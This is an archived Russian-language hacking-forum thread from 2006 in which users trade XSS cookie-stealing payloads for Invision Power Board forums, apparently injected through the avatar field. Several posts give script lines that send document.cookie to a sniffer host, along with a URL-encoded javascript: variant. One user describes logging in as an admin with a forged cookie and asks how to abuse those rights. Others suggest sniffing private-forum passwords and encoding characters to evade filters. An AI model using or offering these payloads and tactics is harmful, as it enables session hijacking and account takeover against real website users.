ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
30.05.2006, 17:01
|
|
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
Провел на форуме:
1864132
Репутация:
116
|
|
Возможно можно стырить куки.
Уж это то тут точно есть.
Просто всесто алерта надо отсылку на сниффер вписать.
Попробуй например:
Код:
<script>
img = new Image();
img.src = "http://адресс_снифера?"+document.cookie;
</script>
|
|
|
01.06.2006, 00:49
|
|
Banned
Регистрация: 07.05.2006
Сообщений: 36
Провел на форуме:
96196
Репутация:
-9
|
|
че за бред !!!!!!! пишу :
javascript:x=document.cookie%3Bimg=new%20Image()%3 Bimg.src=%27http://antichat.ru/cgi-bin/s.jpg%3F%27%2Bx/*.jpg*///.gif
мне говорит :
Не выбрано ни одного аватара. Вернитесь назад и исправьте ошибку. !!!!!!!!!!!!!!!!!
версия форума - v2.1.6
пробол в 2.14 тож непашет !!!!!!!!!!!!!!!!!!!
|
|
|
|
01.06.2006, 09:50
|
|
Новичок
Регистрация: 05.01.2006
Сообщений: 29
Провел на форуме:
105157
Репутация:
0
|
|
Для 2.1.4 есть другая уязвимость на форум античата.Поисчи и попробуй на 2.1.6..
|
|
|
|
03.06.2006, 09:23
|
|
Новичок
Регистрация: 01.06.2006
Сообщений: 4
Провел на форуме:
23702
Репутация:
0
|
|
Через аватар реально работает
Но стырил куки, подделал, зашел как админ, ..... что дальше?
Последний раз редактировалось bab3pack; 03.06.2006 в 10:22..
|
|
|
|
03.06.2006, 10:57
|
|
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
Провел на форуме:
1864132
Репутация:
116
|
|
А ничего 
Соль не даст расшифровать.
Кстати...
Подмена странички работает через аватару?
По идее должна. Не проверял. |
|
|
|
03.06.2006, 12:02
|
|
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415
Репутация:
1398
|
|
Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
Вот в коде img.src = "http://" Заменю ссылку на свой снифер и используй куки. Если фильтрует кавычки и т.д,то используй программу URI crypter, чтобы закодировать те символы которые фильтруються! |
|
|
|
04.06.2006, 19:38
|
|
Новичок
Регистрация: 01.06.2006
Сообщений: 4
Провел на форуме:
23702
Репутация:
0
|
|
я ж говорю, через аватар работает. На данный момент у меня есть подделанный куки админа форума, но расшифровать куки без соли нельзя, вопрос в другом, можно ли каким-нибудь образом использовать то, что логинюсь под админом? хоть какие идеи есть?
Например, можно ли как-нибудь использовать права админа на добавление в календарь какого-нить события и т.д. 
Последний раз редактировалось bab3pack; 04.06.2006 в 20:08..
|
|
|
|
05.06.2006, 19:26
|
|
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
Провел на форуме:
1864132
Репутация:
116
|
|
Думаю да.
Можно ещё отсниффать пароли к внутренним форумам и полазать по ним.
Зависит от настроек форума.
|
|
|
|
07.06.2006, 19:30
|
|
Новичок
Регистрация: 03.05.2006
Сообщений: 3
Провел на форуме:
8208
Репутация:
0
|
|
Ну а как тогда быть, если нет возможности загрузить аватар с другого адреса?
Если ацкий админ выключил в админке эту возможность?
|
|
|
|
07.06.2006, 19:53
|
|
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567
Репутация:
354
|
|
Ладно пацан я хочу тебе сказать что существует сайт который как-раз подходит к решению и к решению любой проблемы связаной с Уязвимостью . Этот сайт называется securityfocus.
Зайди сюда: http://www.securityfocus.com/vulnerabilities
найди invision power services потом в нижнем окне напиши invision power board и вследущем окне выбири версию форума.
Надеюсь я тебе помог.
dracula4ever |
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
